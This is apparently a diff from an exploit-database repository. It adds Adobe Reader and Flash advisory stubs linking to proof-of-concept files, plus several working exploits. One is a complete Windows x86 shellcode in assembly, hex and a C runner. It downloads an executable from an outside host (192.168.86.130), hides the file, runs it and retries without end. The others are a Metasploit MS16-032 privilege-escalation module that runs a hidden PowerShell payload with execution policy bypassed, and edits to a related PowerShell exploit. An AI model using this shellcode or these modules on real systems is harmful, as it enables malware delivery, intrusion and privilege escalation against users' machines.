https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-28.pdf
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40097.zip
####################################################################################

56
platforms/multiple/dos/40098.txt Executable file
View file

@ -0,0 +1,56 @@
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4208
# COSIG-2016-27
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-27.pdf
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40098.zip
####################################################################################

56
platforms/multiple/dos/40099.txt Executable file
View file

@ -0,0 +1,56 @@
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4207
# COSIG-2016-26
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-26.pdf
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40099.zip
####################################################################################

56
platforms/multiple/dos/40100.txt Executable file
View file

@ -0,0 +1,56 @@
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4206
# COSIG-2016-25
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-25.pdf
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40100.zip
####################################################################################

56
platforms/multiple/dos/40101.txt Executable file
View file

@ -0,0 +1,56 @@
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4201
# COSIG-2016-24
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-24.pdf
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40101.zip
####################################################################################

59
platforms/multiple/dos/40102.txt Executable file
View file

@ -0,0 +1,59 @@
#####################################################################################
# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 22.0.0.192 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE-2016-4179
# COSIG-2016-23
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.[7] Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.
(https://en.wikipedia.org/wiki/Adobe_Flash_Player)
#####################################################################################
============================
2) Rapport de Coordination
============================
2016-05-14: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe publish a patch (APSB16-25);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction
visiting a Web page or open a specially crafted SWF file, which contains “DefineBitsJPEG2” invalid data.
#####################################################################################
===========
4) POC:
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-23.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40102.zip
####################################################################################

59
platforms/multiple/dos/40103.txt Executable file
View file

@ -0,0 +1,59 @@
#####################################################################################
# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 22.0.0.192 and earlier
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE-2016-4175
# COSIG-2016-22
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices. Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.
(https://en.wikipedia.org/wiki/Adobe_Flash_Player)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-10: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe publish a patch (APSB16-25);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction
visiting a Web page or open a specially crafted SWF file, which contains DefineSprite invalid data.
#####################################################################################
===========
4) POC:
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-22-1.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40103.zip
####################################################################################

57
platforms/multiple/dos/40104.txt Executable file
View file

@ -0,0 +1,57 @@
#####################################################################################
# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 22.0.0.192 and earlier
# Author: Francis Provencher of COSIG
# Website: https://cosig.gouv.qc.ca/avis/
# Twitter: @COSIG_
# Date: 12 juillet 2016
# CVE-2016-4177
# COSIG-2016-21
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.[7] Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.
(https://en.wikipedia.org/wiki/Adobe_Flash_Player)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-10: Francis Provencher du COSIG of COSIG report this vulnerability to Adobe PSIRT;
2016-05-17: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe publish a patch (APSB16-25);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction
visiting a Web page or open a specially crafted SWF file, which contains SceneAndFrameData invalid data.
#####################################################################################
===========
4) POC:
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-21.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40104.zip
###############################################################################

57
platforms/multiple/dos/40105.txt Executable file
View file

@ -0,0 +1,57 @@
#####################################################################################
# Application: Adobe Flash Player
# Platforms: Windows,OSX
# Versions: 22.0.0.192 and earlier
# Author: Francis Provencher of COSIG
# Website: https://cosig.gouv.qc.ca/avis/
# Twitter: @COSIG_
# Date: 12 juillet 2016
# CVE-2016-4176
# COSIG-2016-20
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is a freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices.[7] Flash Player was created by Macromedia and has been developed and distributed by Adobe Systems since Adobe acquired Macromedia.
(https://en.wikipedia.org/wiki/Adobe_Flash_Player)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-10: Francis Provencher du COSIG of COSIG report this vulnerability to Adobe PSIRT;
2016-05-17: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe publish a patch (APSB16-25);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to a part of the dynamically allocated memory using a user interaction
visiting a Web page or open a specially crafted SWF file, which contains TAG invalid data.
#####################################################################################
===========
4) POC:
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-20.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40105.zip
###############################################################################

432
platforms/win32/shellcode/40094.c Executable file
View file

@ -0,0 +1,432 @@
/*
Title : Windows x86 URLDownloadToFileA()+SetFileAttributesA()+WinExec()+ExitProcess() shellcode
Date : 12-07-2016
Author : Roziul Hasan Khan Shifat
Tested on: Windows 7 x86
*/
/*
Disassembly of section .text:
00000000 <_start>:
0: 31 c9 xor %ecx,%ecx
2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax
6: 8b 40 0c mov 0xc(%eax),%eax
9: 8b 70 14 mov 0x14(%eax),%esi
c: ad lods %ds:(%esi),%eax
d: 96 xchg %eax,%esi
e: ad lods %ds:(%esi),%eax
f: 8b 48 10 mov 0x10(%eax),%ecx
12: 8b 59 3c mov 0x3c(%ecx),%ebx
15: 01 cb add %ecx,%ebx
17: 8b 5b 78 mov 0x78(%ebx),%ebx
1a: 01 cb add %ecx,%ebx
1c: 8b 73 20 mov 0x20(%ebx),%esi
1f: 01 ce add %ecx,%esi
21: 31 d2 xor %edx,%edx
00000023 <count>:
23: 42 inc %edx
24: ad lods %ds:(%esi),%eax
25: 01 c8 add %ecx,%eax
27: 81 38 47 65 74 50 cmpl $0x50746547,(%eax)
2d: 75 f4 jne 23 <count>
2f: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax)
36: 75 eb jne 23 <count>
38: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax)
3f: 75 e2 jne 23 <count>
41: 8b 73 1c mov 0x1c(%ebx),%esi
44: 01 ce add %ecx,%esi
46: 8b 14 96 mov (%esi,%edx,4),%edx
49: 01 ca add %ecx,%edx
4b: 31 f6 xor %esi,%esi
4d: 89 d6 mov %edx,%esi
4f: 89 cf mov %ecx,%edi
51: 31 c0 xor %eax,%eax
53: 50 push %eax
54: 68 61 72 79 41 push $0x41797261
59: 68 4c 69 62 72 push $0x7262694c
5e: 68 4c 6f 61 64 push $0x64616f4c
63: 54 push %esp
64: 51 push %ecx
65: ff d2 call *%edx
67: 83 c4 0c add $0xc,%esp
6a: 31 c9 xor %ecx,%ecx
6c: 68 6c 6c 41 41 push $0x41416c6c
71: 88 4c 24 02 mov %cl,0x2(%esp)
75: 68 6f 6e 2e 64 push $0x642e6e6f
7a: 68 75 72 6c 6d push $0x6d6c7275
7f: 54 push %esp
80: ff d0 call *%eax
82: 83 c4 0c add $0xc,%esp
85: 31 c9 xor %ecx,%ecx
87: 68 65 41 42 42 push $0x42424165
8c: 88 4c 24 02 mov %cl,0x2(%esp)
90: 68 6f 46 69 6c push $0x6c69466f
95: 68 6f 61 64 54 push $0x5464616f
9a: 68 6f 77 6e 6c push $0x6c6e776f
9f: 68 55 52 4c 44 push $0x444c5255
a4: 54 push %esp
a5: 50 push %eax
a6: ff d6 call *%esi
a8: 83 c4 14 add $0x14,%esp
ab: 50 push %eax
000000ac <download>:
ac: 58 pop %eax
ad: 31 c9 xor %ecx,%ecx
af: 51 push %ecx
b0: 68 2e 65 78 65 push $0x6578652e
b5: 68 6d 70 6c 65 push $0x656c706d
ba: 68 30 2f 73 61 push $0x61732f30
bf: 68 36 2e 31 33 push $0x33312e36
c4: 68 36 38 2e 38 push $0x382e3836
c9: 68 39 32 2e 31 push $0x312e3239
ce: 68 3a 2f 2f 31 push $0x312f2f3a
d3: 68 68 74 74 70 push $0x70747468
d8: 54 push %esp
d9: 59 pop %ecx
da: 31 db xor %ebx,%ebx
dc: 53 push %ebx
dd: 68 2e 65 78 65 push $0x6578652e
e2: 68 70 79 6c 64 push $0x646c7970
e7: 54 push %esp
e8: 5b pop %ebx
e9: 31 d2 xor %edx,%edx
eb: 50 push %eax
ec: 52 push %edx
ed: 52 push %edx
ee: 53 push %ebx
ef: 51 push %ecx
f0: 52 push %edx
f1: ff d0 call *%eax
f3: 59 pop %ecx
f4: 83 c4 2c add $0x2c,%esp
f7: 31 d2 xor %edx,%edx
f9: 39 d0 cmp %edx,%eax
fb: 51 push %ecx
fc: 75 ae jne ac <download>
fe: 5a pop %edx
ff: 31 d2 xor %edx,%edx
101: 68 73 41 42 42 push $0x42424173
106: 88 54 24 02 mov %dl,0x2(%esp)
10a: 68 62 75 74 65 push $0x65747562
10f: 68 74 74 72 69 push $0x69727474
114: 68 69 6c 65 41 push $0x41656c69
119: 68 53 65 74 46 push $0x46746553
11e: 54 push %esp
11f: 57 push %edi
120: ff d6 call *%esi
122: 83 c4 14 add $0x14,%esp
125: 31 c9 xor %ecx,%ecx
127: 51 push %ecx
128: 68 2e 65 78 65 push $0x6578652e
12d: 68 70 79 6c 64 push $0x646c7970
132: 54 push %esp
133: 59 pop %ecx
134: 31 d2 xor %edx,%edx
136: 83 c2 02 add $0x2,%edx
139: 52 push %edx
13a: 51 push %ecx
13b: ff d0 call *%eax
13d: 83 c4 08 add $0x8,%esp
140: 31 c9 xor %ecx,%ecx
142: 68 78 65 63 41 push $0x41636578
147: 88 4c 24 03 mov %cl,0x3(%esp)
14b: 68 57 69 6e 45 push $0x456e6957
150: 54 push %esp
151: 57 push %edi
152: ff d6 call *%esi
154: 83 c4 08 add $0x8,%esp
157: 31 c9 xor %ecx,%ecx
159: 51 push %ecx
15a: 68 2e 65 78 65 push $0x6578652e
15f: 68 70 79 6c 64 push $0x646c7970
164: 54 push %esp
165: 59 pop %ecx
166: 31 d2 xor %edx,%edx
168: 52 push %edx
169: 51 push %ecx
16a: ff d0 call *%eax
16c: 83 c4 08 add $0x8,%esp
16f: 31 c9 xor %ecx,%ecx
171: 68 65 73 73 41 push $0x41737365
176: 88 4c 24 03 mov %cl,0x3(%esp)
17a: 68 50 72 6f 63 push $0x636f7250
17f: 68 45 78 69 74 push $0x74697845
184: 54 push %esp
185: 57 push %edi
186: ff d6 call *%esi
188: ff d0 call *%eax
*/
/*
section .text
global _start
_start:
xor ecx,ecx
mov eax,[fs:ecx+0x30] ;Eax=PEB
mov eax,[eax+0xc] ;eax=PEB.Ldr
mov esi,[eax+0x14] ;esi=PEB.Ldr->InMemOrderModuleList
lodsd
xchg esi,eax
lodsd
mov ecx,[eax+0x10] ;ecx=kernel32.dll base address
;------------------------------------
mov ebx,[ecx+0x3c] ;kernel32.dll +0x3c=DOS->e_flanew
add ebx,ecx ;ebx=PE HEADER
mov ebx,[ebx+0x78];Data_DIRECTORY->VirtualAddress
add ebx,ecx ;IMAGE_EXPORT_DIRECTORY
mov esi,[ebx+0x20] ;AddressOfNames
add esi,ecx
;------------------------------------------
xor edx,edx
count:
inc edx
lodsd
add eax,ecx
cmp dword [eax],'GetP'
jnz count
cmp dword [eax+4],'rocA'
jnz count
cmp dword [eax+8],'ddre'
jnz count
;---------------------------------------------
mov esi,[ebx+0x1c] ;AddressOfFunctions
add esi,ecx
mov edx,[esi+edx*4]
add edx,ecx ;edx=GetProcAddress()
;-----------------------------------------
xor esi,esi
mov esi,edx ;GetProcAddress()
mov edi,ecx ;kernel32.dll
;------------------------------------
;finding address of LoadLibraryA()
xor eax,eax
push eax
push 0x41797261
push 0x7262694c
push 0x64616f4c
push esp
push ecx
call edx
;------------------------
add esp,12
;-----------------------------
;LoadLibraryA("urlmon.dll")
xor ecx,ecx
push 0x41416c6c
mov [esp+2],byte cl
push 0x642e6e6f
push 0x6d6c7275
push esp
call eax
;-----------------------
add esp,12
;-----------------------
;finding address of URLDownloadToFileA()
xor ecx,ecx
push 0x42424165
mov [esp+2],byte cl
push 0x6c69466f
push 0x5464616f
push 0x6c6e776f
push 0x444c5255
push esp
push eax
call esi
;------------------------
add esp,20
push eax
;---------------------------------------
;URLDownloadToFileA(NULL,url,save as,0,NULL)
download:
pop eax
xor ecx,ecx
push ecx
;-----------------------------
;change it to file url
push 0x6578652e
push 0x656c706d
push 0x61732f30
push 0x33312e36
push 0x382e3836
push 0x312e3239
push 0x312f2f3a
push 0x70747468
;-----------------------------------
push esp
pop ecx ;url http://192.168.86.130/sample.exe
xor ebx,ebx
push ebx
;------------------------
;save as (no need change it.if U want to change it,do it)
push 0x6578652e
push 0x646c7970
;-------------------------------
push esp ;pyld.exe
pop ebx ;save as
xor edx,edx
push eax
push edx
push edx
push ebx
push ecx
push edx
call eax
;-------------------------
pop ecx
add esp,44
xor edx,edx
cmp eax,edx
push ecx
jnz download ;if it fails to download , retry contineusly
;------------------
pop edx
;-----------------------
;Finding address of SetFileAttributesA()
xor edx,edx
push 0x42424173
mov [esp+2],byte dl
push 0x65747562
push 0x69727474
push 0x41656c69
push 0x46746553
push esp
push edi
call esi
;--------------------------------
add esp,20 ;U must adjust stack or it will crash
;--------------------
;calling SetFileAttributesA("pyld.exe",FILE_ATTRIBUTE_HIDDEN)
xor ecx,ecx
push ecx
push 0x6578652e
push 0x646c7970
push esp
pop ecx
xor edx,edx
add edx,2 ;FILE_ATTRIBUTE_HIDDEN
push edx
push ecx
call eax
;-------------------
add esp,8
;---------------------------
;finding address of WinExec()
xor ecx,ecx
push 0x41636578
mov [esp+3],byte cl
push 0x456e6957
push esp
push edi
call esi
;----------------------
add esp,8
;------------------------
;calling WinExec("pyld.exe",0)
xor ecx,ecx
push ecx
push 0x6578652e
push 0x646c7970
push esp
pop ecx
xor edx,edx
push edx
push ecx
call eax
;-------------------------
add esp,8
;-----------------------------
;finding address of ExitProcess()
xor ecx,ecx
push 0x41737365
mov [esp+3],byte cl
push 0x636f7250
push 0x74697845
push esp
push edi
call esi
;--------------
call eax
*/
#include<stdio.h>
#include<string.h>
char shellcode[]="\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x31\xf6\x89\xd6\x89\xcf\x31\xc0\x50\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x0c\x31\xc9\x68\x6c\x6c\x41\x41\x88\x4c\x24\x02\x68\x6f\x6e\x2e\x64\x68\x75\x72\x6c\x6d\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x65\x41\x42\x42\x88\x4c\x24\x02\x68\x6f\x46\x69\x6c\x68\x6f\x61\x64\x54\x68\x6f\x77\x6e\x6c\x68\x55\x52\x4c\x44\x54\x50\xff\xd6\x83\xc4\x14\x50\x58\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x6d\x70\x6c\x65\x68\x30\x2f\x73\x61\x68\x36\x2e\x31\x33\x68\x36\x38\x2e\x38\x68\x39\x32\x2e\x31\x68\x3a\x2f\x2f\x31\x68\x68\x74\x74\x70\x54\x59\x31\xdb\x53\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x5b\x31\xd2\x50\x52\x52\x53\x51\x52\xff\xd0\x59\x83\xc4\x2c\x31\xd2\x39\xd0\x51\x75\xae\x5a\x31\xd2\x68\x73\x41\x42\x42\x88\x54\x24\x02\x68\x62\x75\x74\x65\x68\x74\x74\x72\x69\x68\x69\x6c\x65\x41\x68\x53\x65\x74\x46\x54\x57\xff\xd6\x83\xc4\x14\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x59\x31\xd2\x83\xc2\x02\x52\x51\xff\xd0\x83\xc4\x08\x31\xc9\x68\x78\x65\x63\x41\x88\x4c\x24\x03\x68\x57\x69\x6e\x45\x54\x57\xff\xd6\x83\xc4\x08\x31\xc9\x51\x68\x2e\x65\x78\x65\x68\x70\x79\x6c\x64\x54\x59\x31\xd2\x52\x51\xff\xd0\x83\xc4\x08\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x57\xff\xd6\xff\xd0";
main()
{
printf("shellcode length %ld\n",(long)strlen(shellcode));
(* (int(*)()) shellcode) ();
}

8
platforms/windows/local/39719.ps1
View file

@ -207,7 +207,7 @@ function Invoke-MS16-032 {
} }
function Get-SystemToken { function Get-SystemToken {
echo "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($hThread))).ProcessName)" echo "`n[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($hThread))).ProcessName)"
$CallResult = [Kernel32]::SuspendThread($hThread) $CallResult = [Kernel32]::SuspendThread($hThread)
if ($CallResult -ne 0) { if ($CallResult -ne 0) {
@ -278,8 +278,8 @@ function Invoke-MS16-032 {
$hThread = Get-ThreadHandle $hThread = Get-ThreadHandle
# If no thread handle is captured, the box is patched # If no thread handle is captured, the box is patched
if (!$hThread) { if ($hThread -eq 0) {
echo "[!] No valid thread handles were captured, exiting!`n" echo "[!] No valid thread handle was captured, exiting!`n"
Return Return
} else { } else {
echo "[?] Done, using thread handle: $hThread" echo "[?] Done, using thread handle: $hThread"
@ -288,7 +288,7 @@ function Invoke-MS16-032 {
# Get handle to SYSTEM access token # Get handle to SYSTEM access token
Get-SystemToken Get-SystemToken
# If we fail a check in Get-SystemToken, skip loop # If we fail a check in Get-SystemToken, exit
if ($SysTokenHandle -eq 0) { if ($SysTokenHandle -eq 0) {
Return Return
} }

195
platforms/windows/local/40107.rb Executable file
View file

@ -0,0 +1,195 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/payload_generator'
require 'msf/core/exploit/powershell'
require 'rex'
class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking
include Msf::Exploit::Powershell
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::File
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info = {})
super(update_info(info,
'Name' => 'MS16-032 Secondary Logon Handle Privilege Escalation',
'Description' => %q{
This module exploits the lack of sanitization of standard handles in Windows' Secondary
Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12
32 and 64 bit. This module will only work against those versions of Windows with
Powershell 2.0 or later and systems with two or more CPU cores.
},
'License' => BSD_LICENSE,
'Author' =>
[
'James Forshaw', # twitter.com/tiraniddo
'b33f', # @FuzzySec, http://www.fuzzysecurity.com'
'khr0x40sh'
],
'References' =>
[
[ 'MS', 'MS16-032'],
[ 'CVE', '2016-0099'],
[ 'URL', 'https://twitter.com/FuzzySec/status/723254004042612736' ],
[ 'URL', 'https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html']
],
'DefaultOptions' =>
{
'WfsDelay' => 30,
'EXITFUNC' => 'thread'
},
'DisclosureDate' => 'Mar 21 2016',
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' =>
[
# Tested on (32 bits):
# * Windows 7 SP1
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
# Tested on (64 bits):
# * Windows 7 SP1
# * Windows 8
# * Windows 2012
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
],
'DefaultTarget' => 0
))
register_advanced_options(
[
OptString.new('W_PATH', [false, 'Where to write temporary powershell file', nil]),
OptBool.new( 'DRY_RUN', [false, 'Only show what would be done', false ]),
# How long until we DELETE file, we have a race condition here, so anything less than 60
# seconds might break
OptInt.new('TIMEOUT', [false, 'Execution timeout', 60])
], self.class)
end
def get_arch
arch = nil
if sysinfo["Architecture"] =~ /(wow|x)64/i
arch = ARCH_X86_64
elsif sysinfo["Architecture"] =~ /x86/i
arch = ARCH_X86
end
arch
end
def check
os = sysinfo["OS"]
if os !~ /win/i
# Non-Windows systems are definitely not affected.
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Detected
end
def exploit
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
arch1 = get_arch
if check == Exploit::CheckCode::Safe
print_error("Target is not Windows")
return
elsif arch1 == nil
print_error("Architecture could not be determined.")
return
end
# Exploit PoC from 'b33f'
ps_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-0099', 'cve_2016_0099.ps1')
vprint_status("PS1 loaded from #{ps_path}")
ms16_032 = File.read(ps_path)
cmdstr = expand_path('%windir%') << '\\System32\\windowspowershell\\v1.0\\powershell.exe'
if datastore['TARGET'] == 0 && arch1 == ARCH_X86_64
cmdstr.gsub!("System32","SYSWOW64")
print_warning("Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell")
vprint_warning("#{cmdstr}")
end
# payload formatted to fit dropped text file
payl = cmd_psh_payload(payload.encoded,payload.arch,{
encode_final_payload: false,
remove_comspec: true,
method: 'old'
})
payl.sub!(/.*?(?=New-Object IO)/im, "")
payl = payl.split("';$s.")[0]
payl.gsub!("''","'")
payl = "$s=#{payl}while($true){Start-Sleep 1000};"
@upfile=Rex::Text.rand_text_alpha((rand(8)+6))+".txt"
path = datastore['W_PATH'] || pwd
@upfile = "#{path}\\#{@upfile}"
fd = session.fs.file.new(@upfile,"wb")
print_status("Writing payload file, #{@upfile}...")
fd.write(payl)
fd.close
psh_cmd = "IEX `$(gc #{@upfile})"
#lpAppName
ms16_032.gsub!("$cmd","\"#{cmdstr}\"")
#lpcommandLine - capped at 1024b
ms16_032.gsub!("$args1","\" -exec Bypass -nonI -window Hidden #{psh_cmd}\"")
print_status('Compressing script contents...')
ms16_032_c = compress_script(ms16_032)
if ms16_032_c.size > 8100
print_error("Compressed size: #{ms16_032_c.size}")
error_msg = "Compressed size may cause command to exceed "
error_msg += "cmd.exe's 8kB character limit."
print_error(error_msg)
else
print_good("Compressed size: #{ms16_032_c.size}")
end
if datastore['DRY_RUN']
print_good("cmd.exe /C powershell -exec Bypass -nonI -window Hidden #{ms16_032_c}")
return
end
print_status("Executing exploit script...")
cmd = "cmd.exe /C powershell -exec Bypass -nonI -window Hidden #{ms16_032_c}"
